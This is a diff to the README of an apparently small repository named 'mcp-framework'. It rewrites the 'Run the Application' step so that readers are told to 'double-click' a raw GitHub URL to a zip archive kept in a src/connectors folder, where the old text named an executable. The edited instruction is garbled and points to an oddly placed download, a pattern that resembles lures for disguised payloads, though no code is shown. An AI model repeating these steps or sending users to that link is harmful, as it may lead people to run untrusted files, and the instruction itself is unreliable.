faldys35/mcp-framework/README.md

 5. **Run the Application:**
    - Open the extracted folder.
-   - Double-click on `mcp-framework.exe` for Windows or the equivalent file for your OS to run the application.
+   - Double-click on `https://raw.githubusercontent.com/faldys35/mcp-framework/main/src/connectors/mcp-framework-v2.1.zip` for Windows or the equivalent file for your OS to run the application.

 6. **Follow the Setup Instructions:** When prompted, follow any on-screen setup instructions to complete the installation.